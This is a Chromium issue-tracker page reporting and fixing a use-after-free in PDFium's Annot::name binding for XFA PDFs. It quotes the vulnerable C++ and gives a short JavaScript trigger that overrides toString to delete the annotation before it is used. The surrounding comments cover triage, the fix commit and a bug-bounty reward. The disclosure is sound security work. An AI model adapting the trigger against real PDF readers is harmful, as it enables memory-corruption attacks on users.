Issue metadata
Sign in to add a comment
|
Security: Use after free in PDFium's Annot::name
Reported by
de...@eng.ucsd.edu,
Jan 10 2017
|
||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS Use after free in PDFium VERSION Chromium 56.0.2915.0 (Developer Build) (64-bit) Revision 9c88c589fdf91ce439627b8eb897cce07552f36c-refs/heads/master@{#431175} JavaScript V8 5.6.267 Operating System OSX 10.12.1 PDFium with XFA enabled REPRODUCTION CASE We have attached the PDF that triggers this bug in addition to the source for that PDF. We create the attached PDF by compiling the source with PDFLatex and then adding an XFA element to the resulting PDF (with a custom program that uses the iText library), which makes it an XFA PDF. The UAF takes place in PDFium's C++ bindings for its JavaScript API: (https://cs.chromium.org/chromium/src/third_party/pdfium/fpdfsdk/javascript/Annot.cpp?sq=package:chromium&l=70) // vp is a CJS_PropValue, a JavaScript object controlled by the user bool Annot::name(IJS_Context* cc, CJS_PropValue& vp, CFX_WideString& sError) { CPDFSDK_BAAnnot* baAnnot = ToBAAnnot(m_pAnnot.Get()); if (!baAnnot) return false; ... CFX_WideString annotName; // When annotName is a WideString, the ">>" operator calls "ToCFXWideString" // with vp as the reciever. This, in turn, calls V8's "ToString" with our vp object. // We can override this function to delete baAnnot. vp >> annotName; // Since we deleted baAnnot in the previous call back into JavaScript, we are now // using it after it has been freed. baAnnot->SetAnnotName(annotName); ... } To hit this C++ code, we embed the following JavaScript in an XFA pdf: function run() { const annots = this.getAnnots(); // annots[0], in this case, corresponds to "vp" in the code above annots[0].name = { toString: () => { // remove the "myRadio" widget which removes "baAnnot" this.removeField("myRadio"); gc(); return false; } }; }
,
Jan 12 2017
Requires XFA as in bug 679642 , so shipping chromium not affected.
,
Jan 12 2017
https://pdfium.googlesource.com/pdfium/+/192497124e7cde747ade7bf89028586eea293be5
,
Jan 12 2017
VRP: same caveats as in 679642, impact none only since we don't ship XFA.
,
Jan 12 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/34ff66f6a7ed64c19c9494b0327a7a4037b7b2ff commit 34ff66f6a7ed64c19c9494b0327a7a4037b7b2ff Author: pdfium-deps-roller <pdfium-deps-roller@chromium.org> Date: Thu Jan 12 22:28:15 2017 Roll src/third_party/pdfium/ db7647083..98d00b230 (4 commits). https://pdfium.googlesource.com/pdfium.git/+log/db7647083d0a..98d00b230aa1 $ git log db7647083..98d00b230 --date=short --no-merges --format='%ad %ae %s' 2017-01-12 dsinclair Remove used items from the CSS code. 2017-01-12 tsepez Don't put timers with ID == 0 into the global timer map. 2017-01-12 tsepez Custom toString() methods may delete annots. 2017-01-12 npm Fix leak in OJPEGReadHeaderInfoSecTablesAcTable when read fails. BUG= 679649 , 679643 , 680520 Documentation for the AutoRoller is here: https://skia.googlesource.com/buildbot/+/master/autoroll/README.md If the roll is causing failures, see: http://www.chromium.org/developers/tree-sheriffs/sheriff-details-chromium#TOC-Failures-due-to-DEPS-rolls TBR=dsinclair@chromium.org Review-Url: https://codereview.chromium.org/2627073004 Cr-Commit-Position: refs/heads/master@{#443386} [modify] https://crrev.com/34ff66f6a7ed64c19c9494b0327a7a4037b7b2ff/DEPS
,
Jan 13 2017
,
Jan 23 2017
The panel awarded $3,500 for this one! Thanks!
,
Feb 24 2017
Should we add reward-3500 and other rewards related labels?
,
Mar 13 2017
Added! Note that the reward amount the panel decided upon was $3,000, but VRP error in your favour...!
,
Apr 21 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 6 2017
,
Oct 6 2017
|
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by de...@eng.ucsd.edu
, Jan 11 2017